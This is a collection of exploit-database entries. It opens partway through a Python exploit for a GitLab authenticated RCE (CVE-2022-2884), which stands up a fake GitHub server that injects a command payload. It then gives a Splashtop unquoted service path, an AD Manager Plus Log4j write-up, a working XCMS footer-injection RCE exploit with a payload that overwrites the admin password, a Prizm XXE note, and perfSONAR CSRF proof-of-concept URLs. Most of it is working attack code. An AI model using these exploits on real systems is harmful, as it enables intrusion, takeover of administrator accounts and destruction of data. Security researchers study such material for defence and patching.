f"{attacker_server}/repos/{fake_user}/{fake_repo}/teams", "temp_clone_token": generate_random_string(32), "topics": [], "trees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/trees{{/sha}}", "updated_at": "2022-06-10T15:12:53Z", "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}", "use_squash_pr_title_as_default": False, "visibility": "private", "watchers": 0, "watchers_count": 0, "web_commit_signoff_required": False } return response def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command): rce_payload = generate_rce_payload(command) response = [ { "active_lock_reason": None, "assignee": None, "assignees": [], "author_association": "OWNER", "body": "hn-issue description", "closed_at": None, "comments": 1, "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/comments", "created_at": "2021-07-23T13:16:55Z", "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/events", "html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3", "id": int(fake_issue_id), "labels": [], "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/labels{{/name}}", "locked": False, "milestone": None, "node_id": base64encode(f"05:Issue{fake_issue_id}"), "_number": 1, "number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}" }}, "performed_via_github_app": None, "reactions": { "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/reactions" }, "repository_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/test", "state": "open", "state_reason": None, "timeline_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/timeline", "title": f"{fake_repo}", "updated_at": "2022-08-14T15:37:08Z", "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3", "user": generate_user_response(attacker_server, fake_user, fake_user_id) } ] return response @app.before_request def received_request(): logging.debug(f"Received request:") logging.debug(f" url = {request.url}") logging.debug(f"headers = {request.headers}") @app.after_request def add_headers(response): response.headers["content-type"] = "application/json; charset=utf-8" response.headers["x-ratelimit-limit"] = "5000" response.headers["x-ratelimit-remaining"] = "4991" response.headers["x-ratelimit-reset"] = "1660136749" response.headers["x-ratelimit-used"] = "9" response.headers["x-ratelimit-resource"] = "core" return response @app.route("/") def index(): return "The server is running." @app.route("/api/v3/rate_limit") def api_rate_limit(): response = { "resources": { "core": { "limit": 5000, "used": 9, "remaining": 4991, "reset": 1660136749 }, "search": { "limit": 30, "used": 0, "remaining": 30, "reset": 1660133589 }, "graphql": { "limit": 5000, "used": 0, "remaining": 5000, "reset": 1660137129 }, "integration_manifest": { "limit": 5000, "used": 0, "remaining": 5000, "reset": 1660137129 }, "source_import": { "limit": 100, "used": 0, "remaining": 100, "reset": 1660133589 }, "code_scanning_upload": { "limit": 1000, "used": 0, "remaining": 1000, "reset": 1660137129 }, "actions_runner_registration": { "limit": 10000, "used": 0, "remaining": 10000, "reset": 1660137129 }, "scim": { "limit": 15000, "used": 0, "remaining": 15000, "reset": 1660137129 }, "dependency_snapshots": { "limit": 100, "used": 0, "remaining": 100, "reset": 1660133589 } }, "rate": { "limit": 5000, "used": 9, "remaining": 4991, "reset": 1660136749 } } return response @app.route("/api/v3/repositories/<repo_id>") @app.route("/repositories/<repo_id>") def api_repositories_repo_id(repo_id: int): address = current_app.config["address"] port = current_app.config["port"] attacker_server = current_app.config["attacker_server"] fake_user = current_app.config["fake_user"] fake_user_id = current_app.config["fake_user_id"] fake_repo = current_app.config["fake_repo"] response = generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id) return response @app.route("/api/v3/repos/<user>/<repo>") def api_repositories_repo_user_repo(user: string, repo: string): address = current_app.config["address"] port = current_app.config["port"] attacker_server = current_app.config["attacker_server"] fake_user_id = current_app.config["fake_user_id"] fake_repo_id = current_app.config["fake_repo_id"] response = generate_repo_response(address, port, attacker_server, user, fake_user_id, repo, fake_repo_id) return response @app.route("/api/v3/repos/<user>/<repo>/issues") def api_repositories_repo_user_repo_issues(user: string, repo: string): attacker_server = current_app.config["attacker_server"] fake_user_id = current_app.config["fake_user_id"] fake_issue_id = current_app.config["fake_issue_id"] command = current_app.config["command"] response = generate_issue_response(attacker_server, user, fake_user_id, repo, fake_issue_id, command) return response @app.route("/api/v3/users/<user>") def api_users_user(user: string): attacker_server = current_app.config["attacker_server"] fake_user_id = current_app.config["fake_user_id"] response = generate_user_full_response(attacker_server, user, fake_user_id) return response @app.route("/<user>/<repo>.git/HEAD") @app.route("/<user>/<repo>.git/info/refs") @app.route("/<user>/<repo>.wiki.git/HEAD") @app.route("/<user>/<repo>.wiki.git/info/refs") def empty_response(user: string, repo: string): logging.debug("Empty string response.") return "" # All the others/non-existing routes. @app.route('/<path:path>') def catch_all(path): logging.debug("Empty JSON array response.") return [] def main(): args = parse_arguments() logging_level = DEFAULT_LOGGING_LEVEL if args.verbose: logging_level = logging.DEBUG logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s") validate_input(args) url = args.url.strip() private_token = args.private_token.strip() target_namespace = args.target_namespace.strip() address = args.address.strip() port = args.port is_https = args.https command = args.command.strip() delay = args.delay logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}") logging.debug("Parameters:") logging.debug(f" url = {url}") logging.debug(f" private_token = {private_token}") logging.debug(f"target_namespace = {target_namespace}") logging.debug(f" address = {address}") logging.debug(f" port = {port}") logging.debug(f" is_https = {is_https}") logging.debug(f" command = {command}") logging.debug(f" delay = {delay}") fake_repo_id = generate_random_number(9) fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id)) fake_github_server.start() logging.info("Waiting for the fake GitHub server to start.") while not is_server_alive(address, port, is_https): time.sleep(1) logging.debug("Waiting for the fake GitHub server to start.") logging.info("Fake GitHub server is running.") try: send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id) except: logging.critical("Aborting the script.") fake_github_server.kill() sys.exit(1) if delay is not None: logging.info(f"Waiting for {delay} seconds to let attack finish.") time.sleep(delay) else: logging.info("Press Enter when the attack is finished.") input() logging.debug("Stopping the fake GitHub server.") fake_github_server.kill() logging.info("Closing the script.") if __name__ == "__main__": main()

# Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path # Date: 12/20/2022 # Exploit Author: A.I. hernandez # Version: 8.71.12001.0 # Vendor Homepage: https://www.splashtop.com # Version: current version # Tested on: Windows 10 21H2 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Splashtop Software Updater Service SSUService C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe Auto C:\>sc qc SSUService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SSUService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Splashtop Software Updater Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE) # Exploit Author: Chan Nyein Wai & Thura Moe Myint # Vendor Homepage: https://www.manageengine.com/products/ad-manager/ # Software Link: https://www.manageengine.com/products/ad-manager/download.html # Version: Ad Manager Plus Before 7122 # Tested on: Windows # CVE : CVE-2021-44228 # Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md ### Description In the summer of 2022, I have been doing security engagement on Synack Red Team in the collaboration with my good friend (Thura Moe Myint). At that time, Log4j was already widespread on the internet. Manage Engine had already patched the Ad Manager Plus to prevent it from being affected by the Log4j vulnerability. They had mentioned that Log4j was not affected by Ad Manager Plus. However, we determined that the Ad Manager Plus was running on our target and managed to exploit the Log4j vulnerability. ### Exploitation First, Let’s make a login request using proxy. Inject the following payload in the ```methodToCall``` parameter in the ```ADSearch.cc``` request. Then you will get the dns callback with username in your burp collabrator. ### Notes When we initially reported this vulnerability to Synack, we only managed to get a DNS callback and our report was marked as LDAP injection. However, we attempted to gain full RCE on the host but were not successful. Later, we discovered that Ad Manager Plus was running on another target, so we tried to get full RCE on that target. We realized that there was a firewall and an anti-virus running on the machine, so most of our payloads wouldn't work. After spending a considerable amount of time , we eventually managed to bypass the firewall and anti-virus, and achieve full RCE. ### Conclusion We had already informed Zoho about the log4j vulnerability, and even after it was fixed, they decided to reward us with a bonus bounty for our report. ### Mitigation Updating to a version of Ad Manager Plus higher than 7122 should resolve the issue.

Exploit Title: XCMS v1.83 - Remote Command Execution (RCE) Author: Onurcan Email: [email protected] Site: ihteam.net Script Download : http://www.xcms.it Date: 26/12/2022 The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms. Taking "home.php" for example: <?php //home.php [...] include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb" ?> So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel. So let's take a look to the bugged code. <?php //cpie.php [...] if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- so miss an exit() :-D [...] if(isset($_POST['salva'])){ Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control } [...] ?> So with a simple html form we can change the footer. Ex: <form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post"> <input type="hidden" name="salva" value="OK" /> <textarea name="testo_0"><?php YOUR PHP CODE ?></textarea> <input type="submit" value="Modifica" /> </form> <script>document.editor.submit()</script> Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials. Trick: We can change the admin panel password by inserting this code in the footer: <?php $pwd = "owned"; // <- Place here your new password. $pwd2 = md5($pwd); unlink("dati/generali/pass.php"); $f = fopen("dati/generali/pass.php",w); fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>"); fclose($f); ?> This code delete the old password file and then create a new one with your new password. Fix: <?php //cpie.php [...] if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug. [...] if(isset($_POST['salva'])){ Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control } [...] ?> So this is a simple exploit: <?php if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){ echo " <form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\"> <input type=\"hidden\" name=\"salva\" value=\"OK\" /> <textarea name=\"testo_0\">".$_POST['code']."</textarea> <input type=\"submit\" value=\"Modifica\" /> </form> <script>document.editor.submit()</script>"; }else{ echo" <pre> XCMS <= v1.82 Remote Command Execution Vulnerability Dork : inurl:\"mod=notizie\" by Onurcan Visit ihteam.net </pre> <form method=POST action=".$_POST['PHP_SELF']."> <pre> Site : <input type=text name=site /> Code : <textarea name=code cols=49 rows=14>Your code here</textarea> <input type=submit value=Exploit /> <input type=hidden name=\"send\" /> </pre> </form>"; } ?>

# Exploit Title: Prizm Content Connect v10.5.1030.8315 - XXE # Date: 21/12/2022 # Exploit Author: @xhzeem # Vendor Homepage: https://help.accusoft.com/PCC/v9.0/HTML/About%20Prizm%20Content%20Connect.html # Version: v10.5.1030.8315 The Prizm Content Connect v10.5.1030.8315 is vulnerable to XXE Proof Of Concept: http://www.example.com/default.aspx?document=file.xml The file.xml can have an OoB XXE payload or any other blind XXE exploit.

Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF Link: https://github.com/perfsonar/ Affected Versions: v4.x <= v4.4.5 Vulnerability Type: Partial Blind CSRF Discovered by: Ryan Moore CVE: CVE-2022-41413 Summary A partial blind CSRF vulnerability exists in perfSONAR v4.x <= v4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the URL parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHTTPRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR. This vulnerability was patched in perfSONAR v4.4.6. Proof of Concept Examples Here are two examples of this vulnerability. For further details, review the Technical Overview section below. Example 1: Client browser connects to www.google.com in the background. http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com Example 2: Client browser connects to arbitrary IP and port in the background, passing delete parameter to /api endpoint. http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api